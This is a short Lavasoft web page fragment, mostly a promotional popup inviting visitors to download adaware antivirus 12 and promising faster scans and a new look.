© 2024 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now